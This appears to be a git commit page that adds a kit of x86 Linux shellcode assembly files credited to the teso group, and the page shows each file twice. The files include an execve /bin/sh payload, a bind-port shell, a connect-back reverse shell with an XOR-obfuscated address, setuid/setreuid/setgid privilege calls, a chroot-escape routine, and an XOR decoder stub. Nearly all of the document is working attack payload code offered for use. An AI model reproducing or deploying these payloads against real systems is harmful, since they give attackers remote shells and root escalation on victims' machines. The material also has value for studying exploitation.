initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/x86_linux
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
16 files changed, 435 insertions, 0 deletions
diff --git a/other/shellkit/x86_linux/AUTHORS b/other/shellkit/x86_linux/AUTHORS
new file mode 100644
index 0000000..e5ad29f
--- /dev/null
+++ b/other/shellkit/x86_linux/AUTHORS
@@ -0,0 +1,5 @@
+files by:
+palmers / teso
+changed by:
+lorian / teso
diff --git a/other/shellkit/x86_linux/chmod.s b/other/shellkit/x86_linux/chmod.s
new file mode 100644
index 0000000..63efd8b
--- /dev/null
+++ b/other/shellkit/x86_linux/chmod.s
@@ -0,0 +1,23 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        jmp     file
+chmod:
+        xorl    %eax,           %eax
+        popl    %ebx
+        movb    %al,            0x4(%ebx)
+        movl    $0x41414141,    %ecx
+        movb    $0xf,           %al
+        int     $0x80
+file:
+        call    chmod
+        .ascii ""
+cend:
diff --git a/other/shellkit/x86_linux/chroot.s b/other/shellkit/x86_linux/chroot.s
new file mode 100644
index 0000000..dd7e878
--- /dev/null
+++ b/other/shellkit/x86_linux/chroot.s
@@ -0,0 +1,34 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+/* mkdir AA.. */
+        cdq
+        movl    $0x73507350,    %ecx
+        push    %eax
+        push    $0x2e2e4141
+        movl    %esp,           %ebx
+        movb    $0x27,          %al
+        int     $0x80
+/* chroot AA.. */
+        movb    $0x3d,          %al
+        int     $0x80
+/* chdir .. x 5 */
+        addb    $0x2,           %bl
+cd_loop:
+        incb    %dl
+        movb    $0xc,           %al
+        int     $0x80
+        cmp     $0x6a,          %dl
+        jne     cd_loop
+/* chroot . */
+        incb    %bl
+        movb    $0x3d,          %al
+        int     $0x80
+cend:
diff --git a/other/shellkit/x86_linux/codedump b/other/shellkit/x86_linux/codedump
new file mode 100644
index 0000000..fe9bb8e
--- /dev/null
+++ b/other/shellkit/x86_linux/codedump
Binary files differ
diff --git a/other/shellkit/x86_linux/connect.s b/other/shellkit/x86_linux/connect.s
new file mode 100644
index 0000000..452a1d4
--- /dev/null
+++ b/other/shellkit/x86_linux/connect.s
@@ -0,0 +1,61 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+/* socket */
+        xorl    %eax,           %eax
+        cdq
+        push    %eax
+        incb    %al
+        movl    %eax,           %ebx
+        push    %eax
+        incb    %al
+        push    %eax
+        movl    %esp,           %ecx
+        movb    $0x66,          %al
+        int     $0x80
+/* connect */
+        movl    $0x41414141,    %ecx
+        xorl    $0x4041413e,    %ecx            /* address: 127.0.0.1 */
+        push    %ecx
+        pushw   $0x7450
+        pushw   %dx
+        movl    %esp,           %ecx
+        movl    %eax,           %edx
+        push    $0x10
+        push    %ecx
+        push    %edx
+        movl    %esp,           %ecx
+        movb    $0x03,          %bl
+        movb    $0x66,          %al
+        int     $0x80
+/* dup2 fd 0 + fd 1 */
+        movl    %edx,           %ebx
+        xorl    %ecx,           %ecx
+        movb    $0x3f,          %al
+        int     $0x80
+        incb    %cl
+        movb    $0x3f,          %al
+        int     $0x80
+/* execve shell (by lorian, see execve.s) - slightly modified */
+        movb    $0x0b,          %al
+        cdq
+        pushl     %edx
+        push      $0x68732F6E
+        push      $0x69622F2F
+        movl      %esp, %ebx
+        pushl     %edx
+        pushl     %ebx
+        movl      %esp, %ecx
+        int       $0x80
+cend:
diff --git a/other/shellkit/x86_linux/execve b/other/shellkit/x86_linux/execve
new file mode 100644
index 0000000..3a17d3f
--- /dev/null
+++ b/other/shellkit/x86_linux/execve
Binary files differ
diff --git a/other/shellkit/x86_linux/execve.s b/other/shellkit/x86_linux/execve.s
new file mode 100644
index 0000000..2fdb69f
--- /dev/null
+++ b/other/shellkit/x86_linux/execve.s
@@ -0,0 +1,22 @@
+/* x86/linux execve /bin/sh shellcode
+ *
+ * lorian / teso
+ */
+ 
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        pushl     $0x0b
+        popl      %eax
+        cdq
+        pushl     %edx
+        push      $0x68732F6E
+        push      $0x69622F2F
+        movl      %esp, %ebx
+        pushl     %edx
+        pushl     %ebx
+        movl      %esp, %ecx
+        int       $0x80
+cend:
diff --git a/other/shellkit/x86_linux/exit.s b/other/shellkit/x86_linux/exit.s
new file mode 100644
index 0000000..1fe28f6
--- /dev/null
+++ b/other/shellkit/x86_linux/exit.s
@@ -0,0 +1,14 @@
+/* x86/linux exit shellcode
+ *
+ * lorian / teso 
+ */
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        xorl    %eax,   %eax
+        incl    %eax
+        int     $0x80
+cend:
diff --git a/other/shellkit/x86_linux/portshell.s b/other/shellkit/x86_linux/portshell.s
new file mode 100644
index 0000000..31aa68c
--- /dev/null
+++ b/other/shellkit/x86_linux/portshell.s
@@ -0,0 +1,73 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+/* socket */
+        xorl    %eax,           %eax
+        cdq
+        push    %eax
+        incb    %al
+        movl    %eax,           %ebx
+        push    %eax
+        incb    %al
+        push    %eax
+        movl    %esp,           %ecx
+        movb    $0x66,          %al
+        int     $0x80
+/* bind */
+        push    %edx
+        pushw   $0x7350
+        pushw   %dx
+        movl    %esp,           %edx
+        push    $0x10
+        push    %edx
+        push    %eax
+        movl    %esp,           %ecx
+        incb    %bl
+        movl    %eax,           %edx
+        movb    $0x66,          %al
+        int     $0x80
+/* listen */
+        addb    $0x02,          %bl
+        movb    $0x66,          %al
+        int     $0x80
+/* accept */
+        push    %eax
+        push    %edx
+        movl    %esp,           %ecx
+        incb    %bl
+        movb    $0x66,          %al
+        int     $0x80
+/* dup2 fd 0 + fd 1 */
+        movl    %eax,           %ebx
+        xorl    %ecx,           %ecx
+        movb    $0x3f,          %al
+        int     $0x80
+        incb    %cl
+        movb    $0x3f,          %al
+        int     $0x80
+/* execve shell (by lorian, see execve.s) - slightly modified */
+        movb    $0x0b,          %al
+        cdq
+        pushl     %edx
+        push      $0x68732F6E
+        push      $0x69622F2F
+        movl      %esp, %ebx
+        pushl     %edx
+        pushl     %ebx
+        movl      %esp, %ecx
+        int       $0x80
+cend:
diff --git a/other/shellkit/x86_linux/portshell_slice.s b/other/shellkit/x86_linux/portshell_slice.s
new file mode 100644
index 0000000..0d4c7b1
--- /dev/null
+++ b/other/shellkit/x86_linux/portshell_slice.s
@@ -0,0 +1,77 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+/* socket */
+        xorl    %eax,           %eax
+        cdq
+        push    %eax
+        incb    %al
+        movl    %eax,           %ebx
+        push    %eax
+        incb    %al
+        push    %eax
+        movl    %esp,           %ecx
+        movb    $0x66,          %al
+        int     $0x80
+/* bind */
+        push    %edx
+        pushw   $0x7350
+        pushw   %dx
+        movl    %esp,           %edx
+        push    $0x10
+        push    %edx
+        push    %eax
+        movl    %esp,           %ecx
+        incb    %bl
+        movl    %eax,           %edx
+        movb    $0x66,          %al
+        int     $0x80
+/* listen */
+        addb    $0x02,          %bl
+        movb    $0x66,          %al
+        int     $0x80
+/* accept */
+        push    %eax
+        push    %edx
+        movl    %esp,           %ecx
+        incb    %bl
+        movb    $0x66,          %al
+        int     $0x80
+/* dup2 fd 0 + fd 1 */
+        movl    %eax,           %ebx
+        xorl    %ecx,           %ecx
+        movb    $0x3f,          %al
+        int     $0x80
+        incb    %cl
+        movb    $0x3f,          %al
+        int     $0x80
+/* execve shell (by lorian, see execve.s) - slightly modified */
+        movb    $0x0b,          %al
+        cdq
+        pushl     %edx
+/*      push      $0x68732F6E */
+/*      push      $0x69622F2F */
+        pushw   $0x6873
+        pushw   $0x2f6e
+        pushw   $0x6962
+        pushw   $0x2f2f
+        movl      %esp, %ebx
+        pushl     %edx
+        pushl     %ebx
+        movl      %esp, %ecx
+        int       $0x80
+cend:
diff --git a/other/shellkit/x86_linux/read.s b/other/shellkit/x86_linux/read.s
new file mode 100644
index 0000000..870d125
--- /dev/null
+++ b/other/shellkit/x86_linux/read.s
@@ -0,0 +1,22 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        jmp     cend
+rrr:
+        movb    $0xfa,  %dl             /* length */
+        popl    %ecx                    /* position */
+        push    $0x41
+        pop     %ebx
+        xorb    $0x41,  %bl
+        push    $0x3
+        pop     %eax
+        int     $0x80                   /* read */
+cend:
+        call    rrr
diff --git a/other/shellkit/x86_linux/setgid.s b/other/shellkit/x86_linux/setgid.s
new file mode 100644
index 0000000..0786804
--- /dev/null
+++ b/other/shellkit/x86_linux/setgid.s
@@ -0,0 +1,14 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+main:
+        pushb   $0x2e
+        popl    %eax
+        movw    $0x4141,        %ebx
+        xorw    $0x4242,        %ebx
+        int     $0x80
+cend:
diff --git a/other/shellkit/x86_linux/setreuid.s b/other/shellkit/x86_linux/setreuid.s
new file mode 100644
index 0000000..c976312
--- /dev/null
+++ b/other/shellkit/x86_linux/setreuid.s
@@ -0,0 +1,16 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+main:
+        pushl   $0x46
+        popl    %eax
+        movw    $0x4141,        %ebx
+        xorw    $0x4141,        %ebx
+        movw    $0x4242,        %ecx
+        xorw    $0x4242,        %ecx
+        int     $0x80
+cend:
diff --git a/other/shellkit/x86_linux/setuid.s b/other/shellkit/x86_linux/setuid.s
new file mode 100644
index 0000000..e78410a
--- /dev/null
+++ b/other/shellkit/x86_linux/setuid.s
@@ -0,0 +1,14 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+main:
+        pushb   $0x17
+        popl    %eax
+        movw    $0x4141,        %ebx
+        xorw    $0x4242,        %ebx
+        int     $0x80
+cend:
diff --git a/other/shellkit/x86_linux/spset.s b/other/shellkit/x86_linux/spset.s
new file mode 100644
index 0000000..9bc19f4
--- /dev/null
+++ b/other/shellkit/x86_linux/spset.s
@@ -0,0 +1,36 @@
+/* x86 spset shellcode
+ *
+ * lorian / teso 
+ */
+        .globl  cbegin
+        .globl  _cbegin
+        .globl  cend
+        .globl  _cend
+/* searches for 512 bytes "free" space on stack without destroying it
+ * like any kind of call would do...
+ *
+ * NOTE: your real shellcode must be terminated with 
+ *       \x78\x56\x34\x12 for this code to work... 
+ */
+_cbegin:
+cbegin:
+        movl    $0x12345678, %eax
+a:
+        cdq
+        movb    $0x02, %dh
+b:
+        popl    %ebx
+        pushl   %ebx
+        incl    %esp
+        decl    %edx
+        jz      c
+        cmpl    %eax, %ebx
+        je      a
+        jmp     b
+c:
+_cend:
+cend:
diff --git a/other/shellkit/x86_linux/xor.s b/other/shellkit/x86_linux/xor.s
new file mode 100644
index 0000000..29e3b78
--- /dev/null
+++ b/other/shellkit/x86_linux/xor.s
@@ -0,0 +1,24 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        jmp     XOR_down
+XOR_up:
+        popl    %ebx
+        movb    $0x26,  %cl             /* lenght */
+XORLoop:
+        xorb    $0x64,  %bl             /* xor key */
+        incl    %ebx
+        dec     %cl
+        jnz     XORLoop
+        jmp     XORLoopDone
+XOR_down:
+        call    XOR_up
+XORLoopDone:
+        .ascii  ""
+cend:
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/x86_linux
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/shellkit/x86_linux/AUTHORS b/other/shellkit/x86_linux/AUTHORS new file mode 100644 index 0000000..e5ad29f --- /dev/null +++ b/other/shellkit/x86_linux/AUTHORS
@@ -0,0 +1,5 @@
	1	files by:
	2	palmers / teso
	3
	4	changed by:
	5	lorian / teso


diff --git a/other/shellkit/x86_linux/chmod.s b/other/shellkit/x86_linux/chmod.s new file mode 100644 index 0000000..63efd8b --- /dev/null +++ b/other/shellkit/x86_linux/chmod.s
@@ -0,0 +1,23 @@
	1
	2	.globl cbegin
	3	.globl cend
	4
	5
	6	cbegin:
	7	jmp file
	8
	9	chmod:
	10	xorl %eax, %eax
	11	popl %ebx
	12	movb %al, 0x4(%ebx)
	13	movl $0x41414141, %ecx
	14
	15	movb $0xf, %al
	16	int $0x80
	17
	18	file:
	19	call chmod
	20	.ascii ""
	21
	22	cend:
	23


diff --git a/other/shellkit/x86_linux/chroot.s b/other/shellkit/x86_linux/chroot.s new file mode 100644 index 0000000..dd7e878 --- /dev/null +++ b/other/shellkit/x86_linux/chroot.s
@@ -0,0 +1,34 @@
	1	.globl cbegin
	2	.globl cend
	3
	4
	5	cbegin:
	6	/* mkdir AA.. */
	7	cdq
	8	movl $0x73507350, %ecx
	9	push %eax
	10	push $0x2e2e4141
	11	movl %esp, %ebx
	12	movb $0x27, %al
	13	int $0x80
	14
	15	/* chroot AA.. */
	16	movb $0x3d, %al
	17	int $0x80
	18
	19	/* chdir .. x 5 */
	20	addb $0x2, %bl
	21
	22	cd_loop:
	23	incb %dl
	24	movb $0xc, %al
	25	int $0x80
	26	cmp $0x6a, %dl
	27	jne cd_loop
	28
	29	/* chroot . */
	30	incb %bl
	31	movb $0x3d, %al
	32	int $0x80
	33	cend:
	34


diff --git a/other/shellkit/x86_linux/codedump b/other/shellkit/x86_linux/codedump new file mode 100644 index 0000000..fe9bb8e --- /dev/null +++ b/other/shellkit/x86_linux/codedump
Binary files differ


diff --git a/other/shellkit/x86_linux/connect.s b/other/shellkit/x86_linux/connect.s new file mode 100644 index 0000000..452a1d4 --- /dev/null +++ b/other/shellkit/x86_linux/connect.s
@@ -0,0 +1,61 @@
	1	.globl cbegin
	2	.globl cend
	3
	4	cbegin:
	5
	6	/* socket */
	7	xorl %eax, %eax
	8	cdq
	9	push %eax
	10	incb %al
	11	movl %eax, %ebx
	12	push %eax
	13	incb %al
	14	push %eax
	15	movl %esp, %ecx
	16	movb $0x66, %al
	17	int $0x80
	18
	19	/* connect */
	20	movl $0x41414141, %ecx
	21	xorl $0x4041413e, %ecx /* address: 127.0.0.1 */
	22	push %ecx
	23	pushw $0x7450
	24	pushw %dx
	25	movl %esp, %ecx
	26	movl %eax, %edx
	27
	28	push $0x10
	29	push %ecx
	30	push %edx
	31	movl %esp, %ecx
	32
	33	movb $0x03, %bl
	34	movb $0x66, %al
	35	int $0x80
	36
	37	/* dup2 fd 0 + fd 1 */
	38	movl %edx, %ebx
	39	xorl %ecx, %ecx
	40
	41	movb $0x3f, %al
	42	int $0x80
	43
	44	incb %cl
	45	movb $0x3f, %al
	46	int $0x80
	47
	48	/* execve shell (by lorian, see execve.s) - slightly modified */
	49	movb $0x0b, %al
	50	cdq
	51	pushl %edx
	52	push $0x68732F6E
	53	push $0x69622F2F
	54	movl %esp, %ebx
	55	pushl %edx
	56	pushl %ebx
	57	movl %esp, %ecx
	58	int $0x80
	59
	60	cend:
	61


diff --git a/other/shellkit/x86_linux/execve b/other/shellkit/x86_linux/execve new file mode 100644 index 0000000..3a17d3f --- /dev/null +++ b/other/shellkit/x86_linux/execve
Binary files differ


diff --git a/other/shellkit/x86_linux/execve.s b/other/shellkit/x86_linux/execve.s new file mode 100644 index 0000000..2fdb69f --- /dev/null +++ b/other/shellkit/x86_linux/execve.s
@@ -0,0 +1,22 @@
	1	/* x86/linux execve /bin/sh shellcode
	2	*
	3	* lorian / teso
	4	*/
	5
	6	.globl cbegin
	7	.globl cend
	8
	9	cbegin:
	10	pushl $0x0b
	11	popl %eax
	12	cdq
	13	pushl %edx
	14	push $0x68732F6E
	15	push $0x69622F2F
	16	movl %esp, %ebx
	17	pushl %edx
	18	pushl %ebx
	19	movl %esp, %ecx
	20	int $0x80
	21
	22	cend:


diff --git a/other/shellkit/x86_linux/exit.s b/other/shellkit/x86_linux/exit.s new file mode 100644 index 0000000..1fe28f6 --- /dev/null +++ b/other/shellkit/x86_linux/exit.s
@@ -0,0 +1,14 @@
	1	/* x86/linux exit shellcode
	2	*
	3	* lorian / teso
	4	*/
	5	.globl cbegin
	6	.globl cend
	7
	8	cbegin:
	9
	10	xorl %eax, %eax
	11	incl %eax
	12	int $0x80
	13
	14	cend:


diff --git a/other/shellkit/x86_linux/portshell.s b/other/shellkit/x86_linux/portshell.s new file mode 100644 index 0000000..31aa68c --- /dev/null +++ b/other/shellkit/x86_linux/portshell.s
@@ -0,0 +1,73 @@
	1	.globl cbegin
	2	.globl cend
	3
	4	cbegin:
	5
	6	/* socket */
	7	xorl %eax, %eax
	8	cdq
	9	push %eax
	10	incb %al
	11	movl %eax, %ebx
	12	push %eax
	13	incb %al
	14	push %eax
	15	movl %esp, %ecx
	16	movb $0x66, %al
	17	int $0x80
	18
	19	/* bind */
	20	push %edx
	21	pushw $0x7350
	22	pushw %dx
	23	movl %esp, %edx
	24
	25	push $0x10
	26	push %edx
	27	push %eax
	28	movl %esp, %ecx
	29
	30	incb %bl
	31	movl %eax, %edx
	32	movb $0x66, %al
	33	int $0x80
	34
	35	/* listen */
	36	addb $0x02, %bl
	37	movb $0x66, %al
	38	int $0x80
	39
	40	/* accept */
	41	push %eax
	42	push %edx
	43	movl %esp, %ecx
	44
	45	incb %bl
	46	movb $0x66, %al
	47	int $0x80
	48
	49	/* dup2 fd 0 + fd 1 */
	50	movl %eax, %ebx
	51	xorl %ecx, %ecx
	52
	53	movb $0x3f, %al
	54	int $0x80
	55
	56	incb %cl
	57	movb $0x3f, %al
	58	int $0x80
	59
	60	/* execve shell (by lorian, see execve.s) - slightly modified */
	61	movb $0x0b, %al
	62	cdq
	63	pushl %edx
	64	push $0x68732F6E
	65	push $0x69622F2F
	66	movl %esp, %ebx
	67	pushl %edx
	68	pushl %ebx
	69	movl %esp, %ecx
	70	int $0x80
	71
	72	cend:
	73


diff --git a/other/shellkit/x86_linux/portshell_slice.s b/other/shellkit/x86_linux/portshell_slice.s new file mode 100644 index 0000000..0d4c7b1 --- /dev/null +++ b/other/shellkit/x86_linux/portshell_slice.s
@@ -0,0 +1,77 @@
	1	.globl cbegin
	2	.globl cend
	3
	4	cbegin:
	5
	6	/* socket */
	7	xorl %eax, %eax
	8	cdq
	9	push %eax
	10	incb %al
	11	movl %eax, %ebx
	12	push %eax
	13	incb %al
	14	push %eax
	15	movl %esp, %ecx
	16	movb $0x66, %al
	17	int $0x80
	18
	19	/* bind */
	20	push %edx
	21	pushw $0x7350
	22	pushw %dx
	23	movl %esp, %edx
	24
	25	push $0x10
	26	push %edx
	27	push %eax
	28	movl %esp, %ecx
	29
	30	incb %bl
	31	movl %eax, %edx
	32	movb $0x66, %al
	33	int $0x80
	34
	35	/* listen */
	36	addb $0x02, %bl
	37	movb $0x66, %al
	38	int $0x80
	39
	40	/* accept */
	41	push %eax
	42	push %edx
	43	movl %esp, %ecx
	44
	45	incb %bl
	46	movb $0x66, %al
	47	int $0x80
	48
	49	/* dup2 fd 0 + fd 1 */
	50	movl %eax, %ebx
	51	xorl %ecx, %ecx
	52
	53	movb $0x3f, %al
	54	int $0x80
	55
	56	incb %cl
	57	movb $0x3f, %al
	58	int $0x80
	59
	60	/* execve shell (by lorian, see execve.s) - slightly modified */
	61	movb $0x0b, %al
	62	cdq
	63	pushl %edx
	64	/* push $0x68732F6E */
	65	/* push $0x69622F2F */
	66	pushw $0x6873
	67	pushw $0x2f6e
	68	pushw $0x6962
	69	pushw $0x2f2f
	70	movl %esp, %ebx
	71	pushl %edx
	72	pushl %ebx
	73	movl %esp, %ecx
	74	int $0x80
	75
	76	cend:
	77


diff --git a/other/shellkit/x86_linux/read.s b/other/shellkit/x86_linux/read.s new file mode 100644 index 0000000..870d125 --- /dev/null +++ b/other/shellkit/x86_linux/read.s
@@ -0,0 +1,22 @@
	1	.globl cbegin
	2	.globl cend
	3
	4	cbegin:
	5	jmp cend
	6
	7	rrr:
	8	movb $0xfa, %dl /* length */
	9
	10	popl %ecx /* position */
	11
	12	push $0x41
	13	pop %ebx
	14	xorb $0x41, %bl
	15
	16	push $0x3
	17	pop %eax
	18	int $0x80 /* read */
	19
	20	cend:
	21	call rrr
	22


diff --git a/other/shellkit/x86_linux/setgid.s b/other/shellkit/x86_linux/setgid.s new file mode 100644 index 0000000..0786804 --- /dev/null +++ b/other/shellkit/x86_linux/setgid.s
@@ -0,0 +1,14 @@
	1	.globl cbegin
	2	.globl cend
	3
	4	cbegin:
	5
	6	main:
	7	pushb $0x2e
	8	popl %eax
	9	movw $0x4141, %ebx
	10	xorw $0x4242, %ebx
	11	int $0x80
	12
	13	cend:
	14


diff --git a/other/shellkit/x86_linux/setreuid.s b/other/shellkit/x86_linux/setreuid.s new file mode 100644 index 0000000..c976312 --- /dev/null +++ b/other/shellkit/x86_linux/setreuid.s
@@ -0,0 +1,16 @@
	1	.globl cbegin
	2	.globl cend
	3
	4	cbegin:
	5
	6	main:
	7	pushl $0x46
	8	popl %eax
	9	movw $0x4141, %ebx
	10	xorw $0x4141, %ebx
	11	movw $0x4242, %ecx
	12	xorw $0x4242, %ecx
	13	int $0x80
	14
	15	cend:
	16


diff --git a/other/shellkit/x86_linux/setuid.s b/other/shellkit/x86_linux/setuid.s new file mode 100644 index 0000000..e78410a --- /dev/null +++ b/other/shellkit/x86_linux/setuid.s
@@ -0,0 +1,14 @@
	1	.globl cbegin
	2	.globl cend
	3
	4	cbegin:
	5
	6	main:
	7	pushb $0x17
	8	popl %eax
	9	movw $0x4141, %ebx
	10	xorw $0x4242, %ebx
	11	int $0x80
	12
	13	cend:
	14


diff --git a/other/shellkit/x86_linux/spset.s b/other/shellkit/x86_linux/spset.s new file mode 100644 index 0000000..9bc19f4 --- /dev/null +++ b/other/shellkit/x86_linux/spset.s
@@ -0,0 +1,36 @@
	1	/* x86 spset shellcode
	2	*
	3	* lorian / teso
	4	*/
	5	.globl cbegin
	6	.globl _cbegin
	7	.globl cend
	8	.globl _cend
	9
	10	/* searches for 512 bytes "free" space on stack without destroying it
	11	* like any kind of call would do...
	12	*
	13	* NOTE: your real shellcode must be terminated with
	14	* \x78\x56\x34\x12 for this code to work...
	15	*/
	16
	17	_cbegin:
	18	cbegin:
	19
	20	movl $0x12345678, %eax
	21	a:
	22	cdq
	23	movb $0x02, %dh
	24	b:
	25	popl %ebx
	26	pushl %ebx
	27	incl %esp
	28	decl %edx
	29	jz c
	30	cmpl %eax, %ebx
	31	je a
	32	jmp b
	33	c:
	34
	35	_cend:
	36	cend:


diff --git a/other/shellkit/x86_linux/xor.s b/other/shellkit/x86_linux/xor.s new file mode 100644 index 0000000..29e3b78 --- /dev/null +++ b/other/shellkit/x86_linux/xor.s
@@ -0,0 +1,24 @@
	1	.globl cbegin
	2	.globl cend
	3
	4	cbegin:
	5	jmp XOR_down
	6
	7	XOR_up:
	8	popl %ebx
	9	movb $0x26, %cl /* lenght */
	10
	11	XORLoop:
	12	xorb $0x64, %bl /* xor key */
	13	incl %ebx
	14	dec %cl
	15	jnz XORLoop
	16	jmp XORLoopDone
	17
	18	XOR_down:
	19	call XOR_up
	20
	21	XORLoopDone:
	22	.ascii ""
	23
	24	cend: